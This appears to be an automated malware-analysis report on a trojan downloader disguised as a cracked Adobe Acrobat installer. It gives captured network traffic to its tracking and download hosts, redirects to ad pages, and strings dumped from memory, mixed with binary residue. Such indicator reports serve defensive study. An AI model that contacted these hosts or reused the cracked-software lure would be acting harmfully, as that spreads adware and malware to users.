.......0...U...........0...U.......0.0 ..U....0...0.1.0...U....TGV-C-670...*.H...............aEc<..'R......]C.ri.Zm.....|..B.$..76..h....l...Xbxua...C.X.S....~K..A..._.T@$.....9(.... ......\.*.....5.b.x...[QM.._9P.=..l...gf..L.?..3 ......Z....._...20R;...x.......C..0....l.G.A..5TS>d.U......w.(\....v..9.z7.....J..;..'...u.Y...BB.@.2u.e..eW..J.U....
<<< skipped >>>
GET /report.php?typ=conversion&transId=139867460&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&s1=2735&s2=10958132&s3=&s4=&s5=1352224761&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.45457626983710575 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: InstallCapital
Host: ee.wintervenepest.bid
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 27 Nov 2016 15:37:30 GMT
Content-Length: 0
HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/8.5..X-Powered-By: PHP/5.3.28..Date: Sun, 27 Nov 2016 15:37:30 GMT..Content-Length: 0..
GET hXXp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: will.ymuscaesnortin.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 5248
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 27 Nov 2016 15:37:22 GMT
X-Cache: Miss from cloudfront
Via: 1.1 0176a7920fd558900dd5f893f79acb9e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: l1my4O3razMEiR5YydeNmDYHWI5pPOfTnr-Yh5bIzfchTkSNUDbItg==
h.......z*Z..-..p.`...i...tg...N....D.@.D^.}D.c..;Y..k.......(...i........o...A....,B.>..........ocZ..........2O.......K..Re.....4.y....\!....4....h...f.^...2.........Uj....-*;Zr.L.$K..A.3.B.e....\>./......."H'..p.>A>..>....(...-/.7X...h.90.OO..1....@.^#}....).z....~I.z4.7p.9.'...1..p..lb..cT.AX9aN..L........g.."q0oU(...c....Y|...n.......x......$q.=.9.,..|.k^OF~....i.0....gnV......$n.i.I>*.#......B<k..k,i.R..,.....:......OA.zE6*Q.1.`.F.T.v......A..I....G.....x..7kH.. .Z....f`.jb.y}".........e.mUd...,."...&...=g.....ia..3. ,....."uDT...!..`..U;u3&...\1#..m..~d..1.....D;.n0...$....)L..C[..F.........ezn].`.w.R... ..U.......@MSmF..v"|...]..w.v.YjZ...1|pD.q........@....>......U3...4l..>P.-..........J....."..a.....@0..-.`..G...TB..Bb..%pC.5d..`.I.<.r\....V.W....G......p...v%!...@#..2... T....F.X...g.....:/.2XDQa..rmA..........#....].Yv..d].......R..|...............W{..>..JA..n.[1..o".C.K....f./$X-..A.."ui.b....@..#:OzhS...Gd..u.rJl1d.h .)d.........%8 ...}.O.K<.........S.......Vf...il.F.h..(...6Z..."J1.T.E.'A.gVm*...&.1E....$...sf.g...._.N..f"....y7.H..V.......Q.s.=.....B.d31%.=....0.Y..0.....t...g.c..B.../Q..$..h&=..BLB.........l..@..ffc1..B.6.....)...g0.__.....?....u....9.^..*....,..........*U...n...!.q.......&.h>.-u.I..pn..$fA.|....Wf.n.8.._...a/K&.(...^.8.$......5.'@K_.MB>....O...t......%$.sM5d7..._.;.{...T)}...c.......Z.~.W.......V...c.~.~y-..K0 ......&..d..{u...d.nwn..2.....#!.f5..(..$8.C...}....S...B.P.F]{UyU9.4.......0v.w.[do..@...^....p1..l^3&[......*.[.jj.b.$...5..{.
<<< skipped >>>
GET /?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1 HTTP/1.0
Host: get.ynoptisticglob.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Connection: close
Server: nginx/1.10.1
Date: Sun, 27 Nov 2016 15:38:10 GMT
X-Powered-By: PHP/5.4.16
Location: hXXp://away.yosauruslega.bid/get.php?ses=482796663418412224
X-Cache: Miss from cloudfront
Via: 1.1 3ef066dcf359ad5dbc339df978147194.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RMWwWYPKPbgGnBwxbKPHR9ahWyMUS2Lgqtmka11YcIwRIWnNjdqqJQ==
GET /redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999 HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ads.affbuzzads.com
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sun, 27 Nov 2016 15:38:42 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Sun, 27 Nov 2016 15:38:42 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..Location: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0..0..
GET hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: win.ketydesmidiana.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 27 Nov 2016 15:38:13 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02734-1024c893cfbfff9cc18408df1cefd7-1006-4-0-0-0-0-UA-0-3131-32373335-3130393538313332-_-_-31333532323234373631-194.242.96.226-20161127103813-_-05006D112A1D243C70397465550C64525E4D096750152358604977030A45533D7834601B4D480F741D; expires=Tue, 27 Dec 2016 15:38:13 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Wed, 23 Oct 2019 02:18:13 GMT; path=/;
tracking_id: 1024c893cfbfff9cc18408df1cefd7
X-Robots-Tag: noindex, nofollow
Content-Length: 453
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here</a>.</p>.</body></html>...
<<< skipped >>>
GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: clients1.google.com
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2016 19:16:52 GMT
Expires: Mon, 28 Nov 2016 19:16:52 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Age: 246112
Cache-Control: public, max-age=345600
0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130113Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..o...........20161123130113Z....20161130130113Z0...*.H...................[...^..=...L....b....qG.1 ]M=F=....P.En/K'.<....}..5..Z,..'0....:".S..d....M...!H.....l]..@ g...V../.%..o......a.Z;....xjW7.S..6...E...|.......QXl.....u.....b....t.q#._..9zl.E...7..f.z.D..U.......2i.J....P!.;`.'.,........\...jk....).......:....."....HTTP/1.1 200 OK..Content-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 19:16:52 GMT..Expires: Mon, 28 Nov 2016 19:16:52 GMT..Server: ocsp_responder..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Age: 246112..Cache-Control: public, max-age=345600..0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130113Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..o...........20161123130113Z....20161130130113Z0...*.H...................[...^..=...L....b....qG.1 ]M=F=....P.En/K'.<....}..5..Z,..'0....:".S..d....M...!H.....l]..@ g...V../.%..o......a.Z;....xjW7.S..6...E...|.......QXl.....u.....b....t.q#._..9zl.E...7..f.z.D..U.......2i.J....P!.;`.'.,........\...jk....).......:....."........
GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: clients1.google.com
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2016 20:12:58 GMT
Expires: Mon, 28 Nov 2016 20:12:58 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Age: 242748
Cache-Control: public, max-age=345600
0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.........|..<63@...B....e.....~.......T^..TO..l(.v..HTTP/1.1 200 OK..Content-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 20:12:58 GMT..Expires: Mon, 28 Nov 2016 20:12:58 GMT..Server: ocsp_responder..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Age: 242748..Cache-Control: public, max-age=345600..0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.........|..<63@...B....e.....~.......T^..TO..l(.v....
GET /r/collect?v=1&_v=j47&a=561957627&t=pageview&_s=1&dl=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&dp=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&ul=en-us&de=utf-8&dt=EN Movie Player TWIN&sd=24-bit&sr=1916x902&vp=1173x539&je=1&fl=23.0 r0&_u=AEAAAEAAI~&jid=2066430644&cid=1439064958.1480261126&tid=UA-13179523-2&_r=1&z=2067671186 HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.google-analytics.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Date: Sun, 27 Nov 2016 15:38:47 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Content-Type: image/gif
Server: Golfe2
Content-Length: 35
GIF89a.............,...........D..;HTTP/1.1 200 OK..Access-Control-Allow-Origin: *..Date: Sun, 27 Nov 2016 15:38:47 GMT..Pragma: no-cache..Expires: Fri, 01 Jan 1990 00:00:00 GMT..Cache-Control: no-cache, no-store, must-revalidate..Last-Modified: Sun, 17 May 1998 03:00:00 GMT..X-Content-Type-Options: nosniff..Content-Type: image/gif..Server: Golfe2..Content-Length: 35..GIF89a.............,...........D..;..
GET /appImg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d2adi7hu49xk5t.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 4628
Connection: keep-alive
Date: Thu, 22 Sep 2016 18:01:12 GMT
Last-Modified: Mon, 13 Jun 2016 11:29:06 GMT
ETag: "ba6c4124ad5d33528fe1d609e6ac1ff0"
Accept-Ranges: bytes
Server: AmazonS3
Age: 74433
X-Cache: Hit from cloudfront
Via: 1.1 616f617776e843142ab5d87231cb3526.cloudfront.net (CloudFront)
X-Amz-Cf-Id: eXOPAKCBYjP73UFpmlKl_Stk7IsY9FpCsFHwDlzEkoSBu4TrH411fQ==
......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.146729, 2012/05/03-13:40:03 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 Windows" xmpMM:InstanceID="xmp.iid:E39F75D6F49A11E4B7DAEACD8AA72C6E" xmpMM:DocumentID="xmp.did:E39F75D7F49A11E4B7DAEACD8AA72C6E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E39F75D4F49A11E4B7DAEACD8AA72C6E" stRef:documentID="xmp.did:E39F75D5F49A11E4B7DAEACD8AA72C6E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................................K.G........................................................................................!..1AQa.."R.T.q24D.%...B#dEU'.bSc.5u&C$t.67(.....................!1AQa..."2BR.q...b....rS.......#............?.<fnfHr.B..v.......ddD.P.Q5.(.(t.....%.KH....,...@L..f.|?..4G.....[......b.......).4_....=.<.....o.....}....6..3D....w........u.{..e.(...yN..f..sr......}...G.o......G\...-TBL.<fex.=.;...u.;..vO6..}.:p...^"x...G.s...k.=....../.t....xg.4O..^..e..z
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_3584:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe
p&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack
p&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B->C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B->C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe
venzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack
venzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B
etc.dll
etc.dll
version="0.5.0.0"
version="0.5.0.0"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
true
true
8 8$8(8,808
8 8$8(8,808